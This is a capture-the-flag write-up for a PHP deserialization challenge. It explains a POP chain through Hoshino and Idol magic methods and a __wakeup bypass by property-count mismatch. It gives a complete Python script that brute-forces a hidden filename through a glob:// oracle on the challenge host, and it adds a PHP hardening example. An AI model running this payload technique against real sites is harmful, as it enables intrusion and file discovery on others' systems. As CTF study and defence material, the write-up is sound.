Challenge source:
```php
<?php
error_reporting(0);
show_source(__FILE__);
class Hoshino
{
    public $Ruby;
    private $Aquamarine;
    public function __destruct()
    {
        $this->Ruby->func();
    }
}
class Idol
{
    public $Akane;
    public function __wakeup()
    {
        $this->Akane = '/var/www/html/The************************.php';
    }
    public function __call($method,$args)
    {
        $Kana = count(scandir($this->Akane));
        if ($Kana > 0) {
            die('Kurokawa Akane');
        } else {
            die('Arima Kana');
        }
    }
}
$a = unserialize(base64_decode($_GET['tuizi']));
?>
```
The POP chain is simple: Hoshino::__destruct (calls a method that does not exist on Idol) => Idol::__call.

The idea is to use the glob:// wrapper with wildcards to guess the name. The glob wrapper looks up file paths matching a pattern, and when nothing matches it returns an array of length 0, so the two different responses at this point give a blind, character-by-character oracle: a script tries one character at a time with a wildcard after it, and if the normal page shows “Kurokawa Akane” the character is correct; then the next one is guessed, until the full filename is found.

__wakeup is bypassed by modifying the object's property count in the serialized data (the script declares 3 properties for Hoshino but supplies only 2).
```python
import requests, base64
from urllib.parse import quote

url = 'http://hcek0fp8wd5f5tudntpuhce7n.node.game.sycsec.com/'
flag = ''
for _ in range(1, 40):
    for i in range(32, 128):
        # skip % * > ? : glob wildcards or characters that break the pattern / URL
        if i in [37, 42, 62, 63]:
            continue
        # Hoshino is declared with 3 properties but only 2 follow: this count
        # mismatch is the __wakeup bypass described above. The private property
        # name keeps its \x00 markers ("\x00Hoshino\x00Aquamarine" is 19 bytes),
        # which is why this is not a raw string.
        ser = ('O:7:"Hoshino":3:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";s:' + str(29 + _)
               + ':"glob:///var/www/html/The' + flag + chr(i) + '*.php";}'
               + 's:19:"\x00Hoshino\x00Aquamarine";N;}')
        ser = ser.encode('utf-8')
        param = base64.b64encode(ser)
        # percent-encode: a bare '+' in the query string would be read as a space
        param = '?tuizi=' + quote(param.decode(), safe='')
        # print(url + param)
        res = requests.get(url + param)
        # print(res.text)
        if 'code>Kurokawa' in res.text:   # scandir() found a match: character is right
            flag += chr(i)
            print(flag)
            break
    else:
        # no character matched at this position: the filename is complete
        break

flag_url = url + 'The' + flag.replace(" ", "") + '.php'
print(flag_url)
print(requests.get(flag_url).text)
```
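As an added defensive counterpart (not the challenge's or the writeup's code), the following PHP hardens the pattern used above: it refuses to instantiate classes during unserialize(), rejects stream-wrapper paths such as glob:// before they reach scandir(), confines the directory to the web root, and returns the same empty result whether the path was rejected or simply empty, so there is no response oracle left to drive a guess. It assumes PHP 8 and /var/www/html as the web root, as in the challenge.

```php
<?php
// Added hardening example for the challenge above (not the challenge's or the
// writeup's code). It closes the three things the chain relies on: gadget
// instantiation by unserialize(), a stream wrapper such as glob:// reaching
// scandir(), and the two distinguishable responses that act as an oracle.
declare(strict_types=1);

const BASE_DIR = '/var/www/html';   // assumed web root, as in the challenge

// Resolve a user-influenced path to a real directory below BASE_DIR, or null.
function safe_dir(string $path): ?string
{
    // Reject any URL-style scheme: glob://, php://, phar://, data://, ...
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path) === 1) {
        return null;
    }
    $real = realpath($path);
    $base = realpath(BASE_DIR);
    if ($real === false || $base === false || !is_dir($real)) {
        return null;
    }
    // Confine to the base directory even after ../ segments are resolved.
    if ($real !== $base && !str_starts_with($real, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $real;
}

// Same empty result for "rejected" and "no entries": nothing to guess against.
function list_dir_hardened(string $path): array
{
    $dir = safe_dir($path);
    if ($dir === null) {
        return [];
    }
    $entries = scandir($dir);
    return $entries === false ? [] : $entries;
}

// Deserialise untrusted input without instantiating any class, so no
// __wakeup / __destruct / __call chain can be assembled from it.
function decode_param(string $b64): mixed
{
    $raw = base64_decode($b64, true);
    if ($raw === false) {
        return null;
    }
    return unserialize($raw, ['allowed_classes' => false]);
}
```

With allowed_classes disabled, any object in the payload becomes a __PHP_Incomplete_Class that triggers no magic methods, and a glob:// value never reaches scandir() at all.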
References:
https://blog.csdn.net/m0_46436640/article/details/119413552
https://www.jianshu.com/p/16c56bebc63d